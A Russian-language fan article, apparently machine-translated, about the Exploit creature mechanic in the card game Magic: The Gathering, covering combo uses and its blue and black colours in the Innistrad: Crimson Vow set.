Π₯отя Exploit срабатываСт Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‚ΠΎΠ³Π΄Π°, ΠΊΠΎΠ³Π΄Π° сущСство Π²Ρ‹Ρ…ΠΎΠ΄ΠΈΡ‚ Π½Π° ΠΏΠΎΠ»Π΅ Π±ΠΈΡ‚Π²Ρ‹, Ссли Ρƒ вас Π΅ΡΡ‚ΡŒ способы бСсконСчного повторСния ΠΈΠ»ΠΈ моргания сущСства, это ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ нСвСроятно ΠΏΠΎΠ»Π΅Π·Π½Ρ‹ΠΌ. НапримСр, установка любого сущСства-эксплойта с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ «ВорТСствСнности» ΠΈ «БвСтящСйся стачСвой Π±Π°Π±ΠΎΡ‡ΠΊΠΈΒ» позволяСт Π²Π°ΠΌ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ бСсконСчноС ΠΊΠΎΠΌΠ±ΠΎ-эксплойт, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ΅ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ Ρ€Π°Π·Ρ€ΡƒΡˆΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΌ для ΠΏΡ€ΠΎΡ‚ΠΈΠ²Π½ΠΈΠΊΠ°.

Какого Ρ†Π²Π΅Ρ‚Π° эксплойт?

Π₯отя ΠΌΡ‹ Π΅Ρ‰Π΅ Π½Π΅ Π²ΠΈΠ΄Π΅Π»ΠΈ всю Innistrad: Crimson Vow, ΠΌΡ‹ Π·Π½Π°Π΅ΠΌ, Ρ‡Ρ‚ΠΎ это ΠΌΠ΅Ρ…Π°Π½ΠΈΠΊΠ° Π·ΠΎΠΌΠ±ΠΈ ΠΈΠ· Π½Π°Π±ΠΎΡ€Π°, ΠΈ поэтому, вСроятно, Π±ΡƒΠ΄Π΅Ρ‚ ΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚ΡŒ ΠΏΡ€ΠΈΠΌΠ΅Ρ€Ρƒ своСго Π±ΠΎΠ»Π΅Π΅ старого, ΠΊΠ»Π°Π½Π° Π’Π°Ρ€ΠΊΠΈΡ€Π° Π‘ΠΈΠ»ΡƒΠΌΠ³Π°Ρ€Π°, ΠΈ Π±ΡƒΠ΄Π΅Ρ‚ ΠΈΡΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ для синих ΠΈ Ρ‡Π΅Ρ€Π½Ρ‹Ρ….

Из восСмнадцати ΠΊΠ°Ρ€Ρ‚ с Exploit ΡˆΠ΅ΡΡ‚ΡŒ ΠΈΠ· Π½ΠΈΡ… синиС, Π° 12 β€” Ρ‡Π΅Ρ€Π½Ρ‹Π΅. Π›ΡŽΠ±ΠΎΠΏΡ‹Ρ‚Π½ΠΎ, Ρ‡Ρ‚ΠΎ Π½Π΅ ΠΌΠ½ΠΎΠ³ΠΎΡ†Π²Π΅Ρ‚Π½Ρ‹Ρ… ΠΊΠ°Ρ€Ρ‚ эксплойтов, нСсмотря Π½Π° Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ ΠΎΠ½ΠΈ Π΄Π΅Π±ΡŽΡ‚ΠΈΡ€ΠΎΠ²Π°Π»ΠΈ Π² Ρ‚Π°ΠΊΠΎΠΌ сСттингС, ΠΊΠ°ΠΊ Π”Ρ€Π°ΠΊΠΎΠ½Ρ‹ Π’Π°Ρ€ΠΊΠΈΡ€Π°, Π² ΠΏΠ°Ρ€Π°Ρ… Ρ†Π²Π΅Ρ‚ΠΎΠ².

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

Π”ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚Π°Ρ€ΠΈΠΉ

Π’Π°Ρˆ адрСс email Π½Π΅ Π±ΡƒΠ΄Π΅Ρ‚ ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π½. ΠžΠ±ΡΠ·Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ поля ΠΏΠΎΠΌΠ΅Ρ‡Π΅Π½Ρ‹ *